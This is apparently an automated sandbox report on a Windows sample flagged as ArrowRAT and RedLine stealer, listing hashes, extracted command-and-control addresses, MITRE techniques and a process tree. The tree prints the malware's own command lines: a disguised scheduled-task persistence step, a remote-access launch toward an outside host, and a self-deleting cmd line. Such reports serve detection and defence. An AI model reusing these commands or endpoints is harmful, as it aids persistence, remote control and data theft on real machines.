arrowrat | 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

Analysis

max time kernel
82s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2022 18:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
Size

18.4MB
MD5

464502cbaae7b9ed1cd6da844d38ba86
SHA1

30dd42539cbfad04564f9db45ca40f2b9e81546c
SHA256

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4
SHA512

e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59
SSDEEP

98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU

Score

10^/10

arrowrat redline @noxycloud client infostealer persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Extracted

Family

redline

Botnet

@NoxyCloud

85.192.63.57:34210

Attributes

auth_value
20dc074852db65a2b74addf964cf576e

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4444-245-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Quoko tace wesa.exe

description pid process target process

PID 4384 created 2476 4384 Quoko tace wesa.exe taskhostw.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

MRH.exeQuoko tace wesa.exe

pid process

4304 MRH.exe
4384 Quoko tace wesa.exe

description	pid	process	target process
PID 4384 created 2476	4384	Quoko tace wesa.exe	taskhostw.exe

pid	process
4304	MRH.exe
4384	Quoko tace wesa.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

MRH.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation MRH.exe
Loads dropped DLL 1 IoCs

Processes:

Quoko tace wesa.exe

pid process

4384 Quoko tace wesa.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MRH.exe

pid	process
4384	Quoko tace wesa.exe

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exeQuoko tace wesa.exeInstallUtil.exe

description	pid	process	target process
PID 2564 set thread context of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 4384 set thread context of 4484	4384	Quoko tace wesa.exe	InstallUtil.exe
PID 4484 set thread context of 2900	4484	InstallUtil.exe	cvtres.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2948 schtasks.exe

pid	process
2948	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 10 IoCs

Processes:

explorer.exeInstallUtil.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{26460135-AA43-4D36-BE5E-18246578A6E5}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	InstallUtil.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2768 PING.EXE

pid	process
2768	PING.EXE

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

AcroRd32.exeMRH.exeQuoko tace wesa.exeInstallUtil.exe

pid	process
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4304	MRH.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4384	Quoko tace wesa.exe
4484	InstallUtil.exe
4484	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

InstallUtil.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	4484	InstallUtil.exe
Token: SeShutdownPrivilege	2300	explorer.exe
Token: SeCreatePagefilePrivilege	2300	explorer.exe
Token: SeShutdownPrivilege	2300	explorer.exe
Token: SeCreatePagefilePrivilege	2300	explorer.exe
Token: SeShutdownPrivilege	2300	explorer.exe
Token: SeCreatePagefilePrivilege	2300	explorer.exe
Token: SeShutdownPrivilege	2300	explorer.exe
Token: SeCreatePagefilePrivilege	2300	explorer.exe
Token: SeShutdownPrivilege	2300	explorer.exe
Token: SeCreatePagefilePrivilege	2300	explorer.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

AcroRd32.exeexplorer.exe

pid process

1508 AcroRd32.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
Suspicious use of SendNotifyMessage 8 IoCs

Processes:

explorer.exe

pid process

2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe
2300 explorer.exe

pid	process
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe
2300	explorer.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

InstallUtil.exeAcroRd32.exeInstallUtil.exeStartMenuExperienceHost.exe

pid	process
992	InstallUtil.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
1508	AcroRd32.exe
4484	InstallUtil.exe
1812	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exeInstallUtil.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2564 wrote to memory of 992	2564	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 992 wrote to memory of 1508	992	InstallUtil.exe	AcroRd32.exe
PID 992 wrote to memory of 1508	992	InstallUtil.exe	AcroRd32.exe
PID 992 wrote to memory of 1508	992	InstallUtil.exe	AcroRd32.exe
PID 1508 wrote to memory of 952	1508	AcroRd32.exe	RdrCEF.exe
PID 1508 wrote to memory of 952	1508	AcroRd32.exe	RdrCEF.exe
PID 1508 wrote to memory of 952	1508	AcroRd32.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 380	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe
PID 952 wrote to memory of 4264	952	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
"C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:992

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1508

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:952

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9B1B4361A50C21DF25A7FABE68305572 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9B1B4361A50C21DF25A7FABE68305572 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
5⤵
PID:4264

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=788D1D1BBE16AB2A137559086BD50A0F --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:380

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=281E355ACFE8D4C1AF03FB24F6C059C1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=281E355ACFE8D4C1AF03FB24F6C059C1 --renderer-client-id=4 --mojo-platform-channel-handle=2324 --allow-no-sandbox-job /prefetch:1
5⤵
PID:4580

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0A78EE24E75F23A17C9BBAE7AAD8B941 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4948

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5CF4FE0910D7224F29E8FA99DB67877F --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:3708

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7A8D0A0C7A05632F707DD1AC5504DB59 --mojo-platform-channel-handle=2772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\MRH.exe
"C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
4⤵
- Creates scheduled task(s)
PID:2948

C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
"C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:4588

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:4908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:4056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4484

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
6⤵
PID:2900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
4⤵
PID:3692

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:3392

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:2768

C:\Users\Admin\AppData\Local\Temp\ROR.exe
"C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
3⤵
PID:3084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:1896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
